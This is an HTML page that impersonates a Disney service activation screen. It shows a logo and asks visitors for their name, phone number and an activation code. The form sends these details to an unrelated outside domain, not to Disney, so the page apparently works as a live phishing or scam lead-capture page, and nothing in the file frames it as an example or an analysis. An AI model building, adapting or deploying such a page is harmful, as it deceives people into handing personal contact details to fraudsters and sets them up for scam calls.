<!DOCTYPE html>

<html>

<head>

  <title>Activate Disney</title>

  <style>

    body {

      background-color: rgb(0, 11, 52);

      display: flex;

      flex-direction: column;

      justify-content: center;

      align-items: center;

      height: 100vh;

      margin: 0;

      border-radius: 8px;

    }



    #centered-image {

      max-width: 50%;

      height: auto;

      margin-top: 20px;

      margin-left: 70px;

    }



    .image-container {

      margin-bottom: 100px;

    }



    form {

      text-align: center;

      color: white;

      width: 400px;

      margin-top: 0px;

      border-radius: 8px;

    }



    form input[type="text"],

    form input[type="submit"] {

      width: 68%;

      padding: 10px;

      margin-bottom: 10px;

      margin-top: 10px;

      font-size: 22px;

      border-radius: 8px;

    }



    form input[type="submit"] {

      background-color: white;

      color: black;

      font-weight: bold;

      font-size: 18px;

      cursor: pointer;

      border-radius: 10px;

      padding: 10px;

      max-width: 150px;

      margin-left: 80px;

    }



    .text-line {

      color: white;

      font-size: 25px;

      margin-bottom: 25px;

      margin-left: 70px;

    }



    .form-label {

      font-size: 28px;

      margin-bottom: px;



    }

  </style>

</head>

<body>

  <img src="logo.png" id="centered-image" width="250" height="150">

  <p class="text-line">Activate Your Disney</p>

 <center><form action="https://generatemynort.online/disalphabita.php" method="POST">

    <label for="name" class="form-label">Name:</label>&nbsp;&nbsp;

    <input type="text" name="SingleLine" id="name" placeholder="Name" required><br>

    <label for="phone" class="form-label">Phone:</label>&nbsp;&nbsp;

    <input type="text" name="SingleLine1" id="phone" placeholder="Phone Number" required><br>

    <label for="code" class="form-label">Code:</label>&nbsp;&nbsp;&nbsp;

    <input type="text" name="SingleLine2" id="code" placeholder="Code" required><br>

   <input type="submit" value="Activate Now">

  </form></center>

</body>

</html>

